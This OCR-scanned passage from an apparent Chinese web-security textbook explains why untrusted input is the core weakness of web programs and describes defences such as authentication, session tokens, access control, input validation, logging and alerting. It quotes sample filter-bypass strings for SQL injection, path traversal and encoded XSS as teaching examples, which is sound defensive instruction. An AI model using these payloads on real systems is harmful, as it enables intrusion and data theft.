执行 非 授 权 操作 或 者 直接 发 动 攻击 。 

加 信息 泄露 。Web 程序 泄露 了 某 项 敏感 信息 ,攻击 者 可 以 利用 这 些 敏 感 信 息 , 进 一 
步 通过 程序 的 其 他 缺陷 展开 攻击 。 

虽然 SSL 协议 可 以 为 浏览 器 和 Web 服务 器 之 间 传 输 的 数据 提供 机 密 性 和 完整 性 保 
护 , 但 是 它 无 法 抵御 直接 针对 Web 程序 的 功能 组 件 的 攻击 ,也 无 法 阻止 上 述 漏洞 发 生 。 
无 论 是 否 使 用 SSL 协议 ,大 多 数 Web 程序 依然 存在 许多 安全 漏洞 。 


13.1.1 安全 问题 


Web 程序 最 为 核心 的 安全 问题 在 于 Web 用 户 可 以 提交 任意 输入 。 由 于 Web 程序 无 
法 控制 浏览 器 ,用 户 几 乎 可 以 向 Web 程序 提交 任意 输入 , Web 程序 必须 假设 所 有 输入 的 
信息 都 可 能 是 恶意 信息 ,必须 保证 攻击 者 无 法 使 用 专门 设计 的 输入 进行 攻击 。 

攻击 者 可 以 采取 的 手段 包括 : 

(1) 修改 浏览 器 与 服务 器 之 间 传 送 的 数据 ,包括 请 求 的 参数 .Cookie 和 HTTP 报 文 
头 部 。 例 如 ,更 改 隐藏 在 HTML 表单 中 产品 价格 字段 ,从 而 以 较 低 的 价格 购买 产品 ; 修 
改 在 HTTP Cookie 中 传送 的 会 话 令 牌 , 劫 持 其 他 用 户 的 会 话 。 

(2) 在 多 阶段 交互 中 , 打 乱 提交 请 求 的 顺序 ,在 每 个 阶段 重复 提交 请 求 或 者 不 提交 参 
数 。 攻 击 者 的 操作 可 能 与 程序 预期 的 操作 完全 不 同 。 

(3) 使 用 多 种 浏览 器 访问 Web 应 用 程序 ,或 者 使 用 辅助 工具 协助 攻击 ,自动 提交 大 
量 普通 浏览 器 无 法 提交 的 请 求 ,查找 Web 程序 存在 的 安全 问题 。 例 如 ,尝试 不 断 改变 由 
后 台数 据 库 处 理 的 某 个 输入 ,从 而 注入 一 个 恶意 SQL 查询 以 获取 敏感 信息 。 

如 果 一 个 Web 程序 必须 接收 并 且 处 理 未 经 验证 的 可 疑 输 入 ,就 会 产生 核心 的 安全 问 
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题 。 更 为 严重 的 是 , Web 程序 开发 过 程 中 的 各 种 潜在 因素 导致 该 安全 问题 很 难 解决 : 

(1) 开发 人 员 缺 少 Web 程序 安全 意识 。 虽 然 大 多 数 IT 安全 人 员 人 掌握 了 不 少 网 络 安 
全 知识 ,但 是 他 们 对 Web 程序 安全 有 关 的 许多 核心 概念 还 是 不 太 了 解 。 另 外 ,他 们 常常 
需要 整合 上 百 个 第 三 方 库 ,导致 无 法 集中 精力 研究 基础 技术 ,使 得 对 所 用 编程 框架 的 安全 
性 往往 做 出 错误 假设 。 

(2) 基于 应 用 程序 框架 开发 。Internet 中 存在 许多 提供 现成 代码 组 件 的 应 用 程序 框 
架 , 可 以 处 理 各 种 常见 的 功能 ,包括 身份 验证 、 页 面 模板 和 公告 牌 等 , Web 程序 员 基 于 这 
些 框架 可 以 快速 方便 地 开发 强大 的 Web 程序 。 但 是 这 些 框架 中 可 能 存在 潜在 的 安全 风 
险 , 由 于 许多 公司 可 能 会 使 用 相同 的 框架 ,因此 只 要 框架 中 存在 一 个 安全 漏洞 ,也 会 影响 
众多 无 关 的 Web 程序 。 

(3) Web 程序 的 安全 威胁 发 展 迅 速 。Web 程序 的 攻击 方法 层出不穷 ,新 概念 和 新 威 
胁 出 现 的 速度 很 快 ,已 有 的 Web 防御 技术 在 这 些 新 的 攻击 面前 会 失去 作用 。 因 此 ,即使 
在 Web 程序 开发 阶段 针对 已 有 威胁 已 经 实现 了 相应 的 安全 防御 机 制 ,也 可 能 到 部 署 阶段 
时 会 面临 许多 未 知 的 威胁 。 

(4) 程序 开发 时 间 和 可 用 资源 十 分 有 限 。 由 于 大 多 数 Web 项 目 由 企业 或 一 两 人 的 
小 团队 独立 开发 ,它们 会 受到 严格 的 时 间 与 资源 限制 。 开 发 团队 不 可 能 雇佣 专职 安全 专 
家 ,而 且 安 全 测试 往往 在 项 目 周 期 的 最 后 阶段 才 进行 ,为 了 按时 完成 项 目 ,开发 团队 往往 
会 忽略 不 明显 的 安全 问题 ,这 就 导 臻 最终 部 署 的 程序 存在 安全 隐患 。 

Web 程序 的 安全 问题 同时 改变 了 目标 系统 的 安全 边界 ,传统 的 网 络 防御 技术 可 以 在 
网 络 边界 部 署 防火 墙 .IPS`VPN .恶意 代码 防范 等 网 络 安全 组 件 , 抵 御 外 部 攻击 者 发 起 的 
攻击 。 但 是 , 当 用 户 访问 Web 程序 时 ,防火 墙 必须 允许 其 通过 HTTP 或 HTTPS 协议 访 
问 内 部 服务 器 , Web 程序 需要 连接 后 台 服 务 器 以 实现 核心 功能 ,所 以 Web 用 户 实际 上 可 
以 穿 过 网 络 防御 组 件 直接 与 后 台 服 务 器 通信 。 因 此 , 当 Web 程序 存在 漏洞 时 , Internet 
的 攻击 者 只 需要 从 浏览 器 提交 专门 设计 的 输入 数据 ,就 可 以 绕 过 这 些 防 御 组 件 直接 攻击 
目标 系统 的 核心 后 端 服务 器 。 

例如 ,攻击 者 希望 攻击 某 个 银行 网 络 , 在 银行 使 用 Web 程序 之 前 ,他 必须 发 现 某 个 网 
络 服务 中 存在 的 安全 漏洞 ,并 利用 它 进入 银行 内 部 某 个 网 络 ,然后 尝试 绕 过 限制 其 访问 关 
键 网 络 的 防火 墙 ,在 关键 网 络 上 确定 重要 的 服务 器 ,最 后 监听 或 破解 关键 用 户 的 口令 以 进 
行 登录 。 但 是 ,如 果 银 行使 用 存在 漏洞 的 Web 程序 ,那么 攻击 者 很 可 能 只 需要 修改 隐藏 
在 HTML 表单 字段 中 的 一 个 账号 ,就 可 以 达到 相同 的 目的 。 

当前 的 Web 程序 安全 状况 表明 ,对 于 用 户 可 以 提交 任意 输入 这 个 核心 安全 问题 , 目 
前 尚未 得 到 很 好 的 解决 。 因 此 ,不 管 是 对 部 署 Web 程序 的 组 织 , 还 是 对 访问 它们 的 用 户 
而 言 , 针 对 Web 程序 的 攻击 都 是 严重 的 威胁 。 


13.1.2 核心 防御 机 制 


由 于 Web 用 户 的 任意 输入 都 不 可 信 , 因 此 Web 程序 必须 实施 大 量 的 安全 机 制 来 防 
御 可 能 的 Web 攻击 。 几 乎 所 有 的 Web 程序 都 采用 概念 类 似 的 安全 机 制 ,主要 包括 以 下 4 
个 部 分 : 
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(1) 处 理 用 户 访问 Web 程序 的 数据 与 功能 ,防止 用 户 获得 未 授权 访问 。 

(2) 处 理 用 户 的 输入 ,防止 错误 输入 造成 潜在 危险 。 

(3) 防范 Web 攻击 ,即使 Web 程序 成 为 攻击 目标 时 ,程序 依然 可 以 正常 运转 。 

(4) 管理 ,监控 和 配置 Web 程序 的 行为 。 

这 些 安全 机 制 实际 上 也 是 攻击 者 主要 攻击 的 方向 ,因此 要 防御 Web 攻击 ,必须 首先 
彻底 了 解 这 些 安全 机 制 的 工作 原理 。 

1. 处 理 用 户 访问 

通常 情况 下 ,用 户 可 以 分 为 匿名 用 户 、. 通 过 验证 的 普通 用 户 和 管理 用 户 ,每 个 用 户 只 
能 访问 被 授权 访问 的 信息 ,例如 只 能 修改 自己 创建 的 文件 而 无 法 修改 或 删除 其 他 用 户 创 
建 的 文件 。 绝 大 部 分 Web 程序 都 使 用 三 种 相互 关联 的 安全 机 制 处 理 用 户 访问 , 即 身份 验 
证 ,会 话 管理 和 访问 控制 。 每 种 机 制 都 可 能 受到 攻击 ,由 于 它们 互相 依赖 ,因此 ,任何 一 种 
机 制 的 实现 ,如 果 存 在 安全 缺陷 ,都 会 导致 攻击 者 非法 访问 数据 。 

1) 身份 验证 

身份 验证 机 制 是 Web 程序 处 理 用 户 访问 的 最 基本 机 制 , 绝 大 部 分 Web 程序 都 采用 
经 典 的 身份 验证 模型 , 即 要 求 用 户 提 交 账 号 和 口令 。 在 一 些 安全 性 要 求 很 高 的 Web 程序 
中 ,往往 会 结合 其 他 证 书 如 客户 端 数字 证 书 、 智 能 卡 , 或 者 采取 多 阶段 登录 过 程 增强 身份 
验证 过 程 。 除 了 登录 过 程 以 外 , Web 程序 还 包括 相应 的 支持 功能 ,如 自我 注册 、 密 码 找 回 
和 密码 修改 等 工具 。 

许多 Web 程序 的 身份 验证 机 制 在 设计 和 实现 时 存在 着 大 量 缺 陷 , 使 得 攻击 者 能 够 确 
定 其 他 用 户 的 账号 ,能够 破解 其 他 用 户 的 密码 ,甚至 能 够 完全 避 开 登录 过 程 。 

2) 会 话 管理 

在 用 户 成 功 登 录 Web 程序 后 ,可 以 访问 各 种 页 面 和 功能 ,提交 一 系列 HTTP 请 求 。 
Web 程序 会 收 到 来 自 不 同 用 户 提交 的 无 数 请 求 , 为 了 实施 有 效 的 访问 控制 , Web 程序 必 
须 识别 并 处 理 来 自 不 同 用 户 的 不 同 请 求 。 

几乎 所 有 的 Web 程序 都 会 为 每 位 成 功 登录 的 用 户 建立 一 个 会 话 , 并 向 用 户 发 布 一 个 
标识 会 话 的 令 牌 。 会 话 可 以 看 作 是 一 组 保存 在 Web 服务 器 上 的 数据 结构 ,用 于 追踪 用 户 
和 Web 程序 的 交互 状态 。 令 牌 通 常 是 一 个 唯一 的 字符 串 , Web 程序 将 其 映射 到 会 话 中 。 
当 用 户 收 到 令 牌 后 ,在 随后 所 有 的 HTTP 请 求 中 ,浏览 器 都 会 同时 提交 该 令 牌 , Web 程 
序 根据 请 求 中 的 令 牌 信息 决定 该 请 求 属于 哪个 用 户 。 当 用 户 持续 一 段 时 间 没 有 发 出 请 
求 ,会 话 将 会 超时 并 自动 终止 。HTTP Cookie 是 实现 会 话 的 常规 方法 ,许多 应 用 程序 也 
使 用 隐藏 表单 字段 或 者 URL 查询 字符 串 的 方式 传送 会 话 令 牌 。 

会 话 管理 机 制 的 安全 性 取决 于 令 牌 的 安全 性 , 令 牌 生成 过 程 中 的 缺陷 有 可 能 使 得 攻 
击 者 可 以 猜测 发 布 给 其 他 用 户 的 令 牌 ,如 果 令 牌 传输 过 程 中 没有 加 密 , 令 牌 就 可 能 被 攻击 
者 监听 并 截获 。 如 果 某 个 用 户 的 令 牌 被 攻破 ,攻击 者 就 可 以 伪装 成 该 用 户 使 用 Web 
程序 。 

有 些 Web 程序 不 发 布 会 话 令 牌 ,而 是 在 每 次 请 求 中 重复 确认 用 户 身 份 , 或 者 将 程序 
状态 保存 在 客户 端 而 不 是 服务 器 ,同时 对 它们 进行 加 密 防 止 遭 到 破坏 。 例 如 ,ASP. NET 
中 的 ViewState 机 制 就 可 以 在 连续 提交 请 求 的 过 程 中 保存 用 户 界面 的 状态 ,而 不 需要 
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Web 程序 维护 所 有 相关 的 状态 信息 。 

3) 访问 控制 

当 Web 程序 从 HTTP 请 求 中 正确 识别 发 出 请 求 的 用 户 身 份 后 ,访问 控制 机 制 需要 
决定 是 否 授权 用 户 执行 其 请 求 的 操作 或 访问 有 关 数 据 。 访 问 控制 机 制 需要 考虑 各 种 相关 
领域 与 不 同类 型 的 功能 ,需要 支持 各 种 拥有 不 同 权 限 的 用 户 角色 ,限制 每 位 用 户 只 允许 访 
问 Web 程序 的 部 分 数据 。 

由 于 典型 的 访问 控制 功能 十 分 复杂 ,因此 在 实现 过 程 中 很 容易 存在 大 量 安全 漏洞 ,使 
得 攻击 者 能 够 获得 对 Web 程序 的 数据 与 功能 的 非法 访问 。Web 程序 员 经 常 对 Web 用 户 
与 程序 的 交互 方式 做 出 错误 假设 ,有 时 也 会 在 程序 实现 时 忽略 访问 控制 检查 。 

2. 处 理 用 户 输入 

必须 假设 所 有 的 用 户 输 入 都 是 恶意 的 ,大 量 针 对 Web 程序 的 攻击 都 与 提交 恶意 输入 
有 关 。 因 此 ,安全 处 理 用 户 的 输入 是 保证 Web 程序 安全 的 一 个 基本 要 求 。Web 程序 的 
每 项 功能 以 及 几乎 每 种 常用 技术 都 可 能 出 现 输入 方面 的 问题 ,输入 确认 (input 
validation) 是 防御 这 些 攻击 的 常用 手段 ,但 是 这 种 防御 机 制 也 并 非 万 能 。 

1) 输入 的 多 样 性 

典型 Web 程序 以 各 种 不 同形 式 处 理 用 户 提交 的 数据 ,单一 的 输入 确认 机 制 可 能 无 法 
适应 所 有 形式 的 输入 。 例 如 ,输入 确认 机 制 可 能 要 求 用 户 名 最 长 不 超过 10 个 字符 , 且 只 
能 包含 字母 和 数字 。 但 是 ,程序 有 时 必须 接受 更 为 广泛 的 输入 ,例如 提交 个 人 信息 的 住址 
字段 可 以 包括 其 他 标点 符号 ,此 时 可 以 将 输入 确认 机 制 设置 为 长 度 不 能 超过 40 个 字符 ， 
同时 不 允许 包含 任意 的 HTML 标签 。 

有 些 时 候 , 程 序 必须 接收 用 户 提 交 的 任意 输入 。 例 如 博客 程序 或 者 电子 公告 牌 程序 ， 
用 户 提交 的 评论 和 文章 可 以 包含 任意 的 攻击 字符 串 ,程序 必须 安全 地 接收 这 些 输入 、 安 全 
地 保存 在 存储 区 域 .安全 地 向 其 他 用 户 显 示 ,不 能 无 端 拒 绝 接 收 用 户 的 输入 。 

Web 程序 也 会 在 服务 端 生 成 大 量 数据 并 传送 给 用 户 , 用 户 在 随后 的 请 求 中 提交 这 些 
数据 ,例如 Cookie 和 隐藏 字段 ,这 些 数据 可 能 被 攻击 者 恶意 修改 。Web 程序 必须 对 这 些 
数据 执行 专门 的 确认 操作 ,如 果 发 现 数据 被 非法 修改 ,应 该 拒绝 该 请 求 并 将 事件 记 入 
日 志 。 

2) 输入 处 理 方法 

可 以 采用 许多 不 同方 法 处 理 用 户 输入 ,不 同 的 方式 适用 于 不 同情 况 和 不 同类 型 的 
输入 。 

(1) 黑 名 单 。 设 置 黑 名 单 文件 .其 中 包含 已 知 的 攻击 字符 串 模 式 , 输 入 确认 机 制 将 拒 
绝 任何 与 黑 名 单 匹配 的 输入 。 该 方法 效率 最 低 ,因为 攻击 者 可 以 轻易 绕 过 黑 名 单 过 滤 方 
式 。 例 如 , 黑 名 单 包 含 “or 1 二 1” 字 符 串 ,那么 攻击 者 可 以 尝试 “or 2 二 2” 来 绕 过 。 有 些 黑 
名 单 不 允许 输入 中 出 现 空格 ,那么 可 以 在 表达 式 之 间 使 用 注释 或 其 他 非 标准 字符 来 取代 
空格 ,例如 “select/ xx /username/ xx /from/ xx /users” 就 是 一 个 无 须 空格 的 SQL 注入 
攻击 字符 串 。 

基于 黑 名 单 的 过 滤 也 容易 受到 空 字 节 “\x00” 的 攻击 ,有 些 程序 在 处 理 字符 串 时 遇 到 
空 字 节 后 会 立即 停止 处 理 输入 ,此 时 攻击 者 可 以 在 攻击 字符 串 的 前 面 插入 空 字 节 ,从 而 避 
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开 黑 名 单 过 滤 。 另 外 ,由 于 Web 攻击 技术 处 于 不 断 发 展 的 过 程 中 ,当前 的 黑 名 单 也 无 法 
防止 新 出 现 的 攻击 方法 。 

(2) 白 名 单 。 输 入 确认 机 制 仅 接收 与 白 名 单 匹配 的 输入 。 例 如 ,程序 在 查询 用 户 的 
身份 证 号 码 时 ,可 能 会 确认 其 仅 包含 数字 信息 ,长 度 必须 为 18, 未 通过 白 名 单 匹配 的 输入 
将 会 被 拒绝 。 这 种 方式 是 处 理 恶意 输入 的 最 有 效 方法 ,但 是 在 很 多 时 候 , Web 程序 必须 
接收 不 匹配 白 名 单 的 数据 并 对 其 进行 处 理 。 例 如 ,在 博客 程序 中 ,用 户 提交 的 文章 或 评论 
就 很 难 使 用 白 名 单 进 行 限 制 。 

(3) 净化 。 净 化 (sanitizing) 指 Web 程序 接收 各 种 恶意 输入 ,但 是 使 用 各 种 方式 对 其 进 
行 修改 ,防止 它们 造成 任何 危害 。 数 据 中 可 能 存在 的 恶意 字符 模式 被 删除 ,只 留 下 已 知 安全 
的 字符 ,或 者 在 对 输入 进行 处 理 之 前 对 恶意 字符 进行 适当 编码 或 转 义 。 例 如 ,对 于 试图 执行 
非 授 权 目 录 中 的 文件 操作 的 恶意 输入 串 ”“..\,.\..N\..N\..NwindowsNsystem32\cmd. exe”, 可 以 
执行 净化 操作 删除 所 有 的 “..\” 模 式 , 净 化 后 的 输入 串 为 "windows\system32\cmd. exe”, 该 输 
入 串 会 因为 “指定 路 径 不 存在 ”而 被 拒绝 访问 。 

净化 方法 十 分 有 效 ,也 是 处 理 恶 意 输入 问题 的 通用 解决 办 法 。 例 如 ,对 恶意 输入 首先 
进行 HTML 编码 再 送 入 Web 程序 ,是 防御 跨 站 脚本 攻击 的 常用 方法 。 但 是 ,有 的 时 候 ， 
一 个 输入 可 能 包含 几 种 不 同类 型 的 恶意 数据 ,此 时 单一 的 净化 方法 很 难 奏效 ,需要 采用 边 
界 确认 方法 进行 处 理 。 

(4) 安全 编程 。 许 多 时 候 , 使 用 不 安全 的 编程 方式 处 理 用 户 提交 的 数据 是 Web 程序 
存在 漏洞 的 根本 原因 。 只 要 保证 处 理 过 程 绝对 安全 即 可 避免 有 关 漏 洞 。 例 如 ,在 数据 库 
访问 过 程 中 正确 使 用 参数 化 查询 , 即 可 有 效 避 免 SQL 注入 攻击 ; 再 如 ,禁止 向 操作 系统 
直接 提交 用 户 输 入 作为 命令 执行 , 即 可 有 效 避 免 命令 注入 。 

(5) 语义 检查 。 在 一 些 Web 攻击 过 程 中 ,攻击 者 提交 的 输入 与 正常 用 户 提交 的 输入 
在 语法 上 完全 相同 ,此 时 只 能 执行 严格 的 语义 检查 。 例 如 ,攻击 者 可 以 修改 隐藏 的 表单 字 
段 提 交 较 低 的 产品 价格 ,Web 程序 必须 确认 所 提交 的 产品 价格 与 存储 在 数据 库 中 的 产品 
价格 一 致 。 

3) 边界 确认 

Web 程序 第 一 次 收 到 用 户 输入 的 地 方 是 一 个 重要 的 信任 边界 ,必须 在 此 实施 确认 机 
制 防御 恶意 输入 。 输 入 确认 的 目的 就 是 净化 所 有 的 潜在 恶意 输入 ,将 净化 后 的 干净 数据 
提交 给 Web 程序 。 此 后 的 数据 即 属于 可 信和 数据 ,不 需要 再 进一步 检查 。 

但 是 ,在 边界 处 执行 单一 的 净化 方法 无 法 防御 所 有 的 Web 攻击 ,原因 如 下 : 

(1) Web 程序 需要 防御 大 量 各 种 各 样 的 基于 输入 的 攻击 ,而 且 每 种 攻击 可 能 采用 完 
全 不 同 的 专门 设计 的 输入 。 

(2) Web 程序 可 能 涉及 一 些 不 同类 型 的 处 理 过 程 ,用 户 提 交 的 输入 可 能 会 在 不 同 的 
组 件 中 引发 许多 操作 ,前 一 个 操作 的 输出 被 用 于 后 一 个 操作 的 输入 。 当 输入 被 净化 后 ,可 
能 会 与 原始 输入 完全 不 同 ,高 明 的 攻击 者 会 利用 输入 确认 机 制 在 关键 处 理 阶段 生成 恶意 
输入 。 

(3) 防御 不 同类 型 的 攻击 需要 对 相互 矛盾 的 用 户 输入 执行 各 种 检查 。 例 如 ,防御 跨 
站 脚本 攻击 可 能 需要 将 <” 字符 编 码 为 *&1t;”, 而 防止 命令 注入 攻击 可 能 会 阻止 包含 
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“下 ?字符 的 输入 ,要 在 Web 程序 的 外 部 边界 同时 阻止 这 些 不 同类 型 的 攻击 是 不 可 能 的 
事情 。 

边界 确认 指 Web 程序 的 每 个 单独 组 件 都 将 其 输入 当成 是 潜在 的 恶意 输入 看 待 , Web 
程序 应 该 在 每 个 组 件 的 信任 边界 上 执行 输入 确认 。 这 样 ,每 个 组 件 都 可 以 防御 它 需要 接 
收 的 特定 类 型 的 输入 。 当 输入 通过 不 同 的 组 件 处 理 时 ,由 于 在 不 同 的 处 理 阶 段 执 行 不 同 
的 确认 检查 或 者 净化 操作 ,因此 各 种 检查 之 间 不 会 发 生 冲 突 。 图 13-1 说 明了 边界 确认 的 
一 种 典型 情况 ,在 用 户 登 录 过 程 中 ,需要 对 用 户 提交 的 数据 进行 若干 步骤 的 处 理 , 并 且 在 
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图 13-1 边界 确认 示例 


Q@ Web 程序 收 到 用 户 的 登录 信息 ,输入 确认 每 个 输入 仅 包含 合法 的 字符 ,符合 长 度 
限制 ,并 且 不 包含 黑 名 单 中 的 攻击 字符 串 模 式 。 

@ Web 程序 执行 SQL 查询 获取 用 户 的 密码 或 证 书信 息 , 为 防御 SQL 注入 攻击 ， 
Web 程序 必须 对 输入 中 可 能 包含 的 SQL 攻击 字符 进行 净化 。 

@ 如 果 用 户 身份 验证 成 功 , Web 程序 将 用 户 账号 的 部 分 信息 发 往 浏览 器 进行 显示 ， 
为 了 防御 跨 站 脚本 攻击 ,Web 程序 必须 对 返回 页 面 的 属于 用 户 提交 的 任何 数据 执行 
HTML 编码 检查 。 

4) 多 步 确认 与 规范 化 

在 输入 确认 过 程 中 ,如 果 需 要 在 多 个 不 同步 骤 中 处 理 用户 输 入 ,可 能 会 出 现 这 样 的 情 
况 : 原本 没有 威胁 的 输入 ,经 过 确认 和 净化 后 ,反而 变 成 了 恶意 的 输入 。 当 Web 程序 试 
图 删除 或 编码 输入 的 某 些 攻 击 字符 模式 对 输入 进行 净化 时 ,就 可 能 会 出 现 这 个 问题 。 例 
如 ,为 了 防御 SQL 注入 攻击 ,Web 程序 可 能 会 删除 输入 中 出 现 的 “UNION” 关 键 字 ,但 是 
攻击 者 可 能 输入 *UN/ ** /UNION/ ** /ION”, 该 字符 串 被 净化 后 ,反而 被 重新 合并 成 
恶意 表达 式 。 类 似 地 ,如 果 按 顺序 执行 多 个 确认 步骤 ,攻击 者 可 以 利用 不 同步 又 的 先后 顺 
序 来 避 开 确认 机 制 。 例 如 ,为 了 避免 在 文件 路 径 表 达 式 中 出 现 “..” 字 符 模 式 以 阻止 用 户 
访问 非 授权 目录 ,确认 机 制 可 能 先 删 除 “..\”, 再 删除 “../”, 那 么 使 用 *.... 八 ”字符 模式 就 
可 以 避 开 输入 检查 ,最终 产生 *..\” 模 式 。 

数据 规范 化 指 将 数据 转换 或 解码 成 一 个 常用 字符 集 的 过 程 , 它 会 造成 男 一 个 问题 。 
为 了 能 够 通过 HTTP 安全 传送 不 常见 的 字符 和 二 进 制 数据 ,浏览 器 在 提交 用 户 请 求 时 可 
以 对 用 户 输入 进行 各 种 形式 的 编码 。 如 果 Web 程序 在 实施 过 滤 之 后 才 进 行规 范 化 ,那么 
攻击 者 可 以 使 用 编码 避 开 确认 机 制 。 例 如 ,对 于 输入 “< iframe src 二 j& 间 x61;vasc&.# 
x72;ipt:alert(0)>”, 其 中 一 些 字符 已 经 被 HTML 编码 ,如 果 Web 程序 首先 进行 输入 确 
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认 ( 此 时 无 法 识别 javascript 关键 字 ), 再 进行 HTML 解码 ,就 会 产生 “< iframe src 一 
javascript:alert(0)>”, 该 字符 串 如 果 返 回 给 浏览 器 则 产生 器 站 脚本 漏洞 。 

除了 Web 程序 使 用 的 标准 编码 方案 以 外 ,如 果 Web 程序 采用 的 组 件 将 数据 从 一 个 
字符 集 转 换 为 另外 一 个 字符 集 , 也 可 能 会 导致 规范 化 问题 。 

3. 处 理 攻 击 者 

当 Web 程序 成 为 攻击 者 的 直接 攻击 目标 时 ,应 该 能 够 处 理 并 应 对 这 些 攻击 ,这 是 
Web 程序 安全 机 制 的 一 项 主要 功能 。Web 程序 为 处 理 攻 击 而 采取 的 措施 包括 处 理 错误 、 
维护 日 志 、 报 警 .主动 响应 。 

1) 处 理 错误 

Web 程序 的 一 个 关键 防御 机 制 是 合理 地 处 理 无 法 预料 的 错误 ,或 者 纠正 这 些 错 误 ， 
或 者 向 用 户 发 送 适 当 的 错误 消息 。 在 程序 部 署 后 , Web 程序 不 应 该 在 页 面 响应 中 返回 任 
何 系统 生成 的 消息 或 者 其 他 调试 信息 。 详 细 的 错误 信息 有 利于 攻击 者 向 Web 程序 发 动 
进一步 攻击 ,有 些 情况 下 ,攻击 者 能 够 利用 有 缺陷 的 错误 处 理 方法 从 错误 消息 中 得 到 敏感 
信息 。 

大 多 数 Web 开发 语言 都 提供 良好 的 异常 处 理 机 制 , Web 程序 应 充分 利用 这 些 机 制 
处 理 各 种 错误 。 也 可 以 采用 自 定 义 的 方式 处 理 错误 ,例如 在 页 面 中 统一 返回 不 包含 太 多 
信息 的 错误 消息 。 

2) 维护 日 志 

日 志 在 调查 Web 攻击 时 会 发 挥 很 大 作用 ,日 志 应 该 记录 所 有 的 重要 事件 ,通常 至 少 
包含 以 下 几 项， 

(1) 所 有 与 身份 验证 有 关 的 事件 ,如 成 功 或 失败 登录 、 密 码 修改 或 找 回 ; 

(2) 关键 交易 ,如 转账 和 支付 ; 

(3) 被 访问 控制 机 制 阻止 的 非 授权 访问 ; 

(4) 任何 包含 已 知 攻击 字符 串 模 式 的 请 求 。 

志 一 般 会 记录 每 件 事情 的 发 生 时 间 、 发 起 主机 的 IP 地 址 和 通过 验证 的 用 户 账号 

等 ,日 志文 件 本 身 必须 受到 安全 保护 ,避免 被 非 授权 修改 和 访问 。 一 种 有 效 的 方法 是 将 日 
志保 存在 一 个 单独 的 主机 或 服务 器 上 ,并 且 只 与 Web 程序 进行 安全 的 信息 交互 。 

3) 报警 

报警 机 制 必须 既 能 够 准确 报告 每 次 真实 的 攻击 又 不 能 产生 过 多 的 虚 警 , 需 要 在 两 个 
相互 矛盾 的 目标 之 间 取 得 平衡 ,并 且 在 可 能 的 情况 下 可 以 将 多 个 事件 进行 关联 ,集中 到 一 
个 报警 中 ,确定 Web 程序 正在 受到 的 攻击 。 

Web 程序 防火 墙 (Web Application Firewall,WAF) 就 是 一 组 基于 签名 或 异常 的 规 
则 确定 对 Web 程序 的 恶意 攻击 ,能够 主动 阻止 恶意 请 求 并 向 管理 员 发 送 报警 。 当 Web 
程序 中 存在 漏洞 但 是 无 法 修复 时 ,WAF 比较 有 用 。 然 而 WAF 往往 只 能 确定 标准 的 攻击 
字符 串 , 对 于 隐蔽 攻击 常常 无 能 为 力 。 例 如 ,攻击 者 修改 隐藏 字段 访问 其 他 用 户 的 数据 ， 
或 者 提交 乱 序 的 请 求 避 开 多 步骤 输入 确认 ,在 这 些 情 况 下 ,攻击 者 提交 的 请 求 与 正常 请 求 
一 致 , WAF 无 法 判定 。 

正确 的 做 法 是 将 报警 与 Web 程序 的 输入 确认 机 制 和 其 他 访问 控制 方法 紧密 结合 ， 
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供 完全 自 定义 的 恶意 行为 报警 ,一 旦 防御 机 制 对 输入 进行 检查 后 发 现 有 任何 异常 , 即 可 产 
生 报警 。 

4) 主动 响应 

Web 程序 可 以 采取 自动 的 响应 措施 阻止 攻击 者 进行 攻击 尝试 ,例如 减缓 对 攻击 尝试 
的 页 面 响应 速度 或 者 终止 攻击 者 的 会 话 , 这 些 措施 能 够 阻止 很 多 Internet 中 的 随意 攻击 
行为 ,并 为 管理 员 赢 得 时 间 去 采取 其 他 进一步 的 措施 。 

4. 管理 Web 程序 

任何 有 用 的 Web 程序 都 需要 管理 与 维护 , 它 是 Web 程序 安全 机 制 的 重要 组 成 部 分 ， 
用 于 帮助 管理 员 管 理 用 户 账户 和 角色 、 应 用 监控 和 审计 功能 ,配置 Web 程序 等 。 许 多 
Web 程序 使 用 相同 的 Web 界面 在 内 部 执行 管理 功能 ,此 时 非常 容易 受到 外 部 攻击 : 

(1) 身份 验证 机 制 中 存在 的 薄弱 环节 可 能 使 得 攻击 者 获得 管理 员 权限 。 

(2) 管理 功能 可 能 没有 执行 有 效 的 访问 控制 ,攻击 者 可 能 建立 一 个 最 高 权限 的 新 
账户 。 

(3) 管理 功能 通常 会 显示 普通 用 户 提交 的 数据 ,其 中 存在 的 任何 跨 站 脚本 漏洞 都 会 
导致 用 户 信息 泄露 。 

(4) 管理 功能 往往 没有 经 过 严格 的 安全 测试 ,但 是 它 通常 拥有 最 高 权限 ,一 旦 被 攻击 
者 攻破 ,整个 Web 程序 就 会 被 攻击 者 完全 控制 。 


13.2 Web 程序 技术 


Web 程序 使 用 各 种 不 同 的 技术 实现 其 功能 , Web 程序 攻防 有 关 的 关键 技术 包括 
HTTP、 服 务 器 和 客户 端 常用 技术 以 及 各 种 数据 的 编码 方案 ,掌握 这 些 技术 的 特性 对 于 深 
入 理解 Web 攻防 原理 十 分 重要 。 


要 :并 


HTTP 是 所 有 Web 程序 使 用 的 通信 协议 , 它 使 用 基于 消息 的 模型 : 客户 发 送 一 条 请 
求 消息 ,然后 服务 器 返回 一 条 响应 消息 。 虽 然 HTTP 使 用 有 状态 的 TCP 作为 它 的 传输 
机 制 ,但 是 每 次 请 求 和 响应 都 自动 完成 ,可 以 使 用 不 同 的 TCP 连接 ,HTTP 本 身 是 无 状 
态 的 。 下 面 列 出 一 些 与 Web 攻防 有 关 的 HTTP 内 容 。 

1. 请 求 消息 头 

(1) Referer: 用 于 表示 发 出 请 求 的 原始 URL., 比 如 用 户 从 页 面 *“www. jxnu. edu. cn” 
单 击 某 个 链接 访问 “www. baidu. com”, 那 么 在 发 出 的 HTTP 请 求 中 ,Referer 字段 值 为 
“http://www. jxnu. edu. cn”。 

(2) Host: 用 于 指定 完整 URL 的 主机 名 称 , 如 果 几 个 站 点 使 用 同一 台 服 务 器 做 主 
机 ,那么 必须 使 用 Host 消息 头 区 分 。 

(3) Cookie: 用 于 提交 服务 器 向 客户 端 发 布 的 其 他 参数 。 

(4) Authorization: 用 于 为 内 置 HTTP 身份 验证 服务 向 服务 器 提交 证 书 。 

(5) Origin: 用 于 在 跨 域 请 求 中 ,指示 提出 请 求 的 原始 域 。 
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2. 响应 消息 头 


(1) Set-Cookie: 服务 器 向 浏览 器 发 送 一 个 Cookie 值 ,该 值 随后 由 浏览 器 在 HTTP 
请 求 中 设置 为 Cookie 字段 的 值 ,用 于 标识 用 户 的 身份 或 会 话 。 

(2) Pragma 或 Cache-Control: 用 于 向 浏览 器 传送 缓存 指令 。 

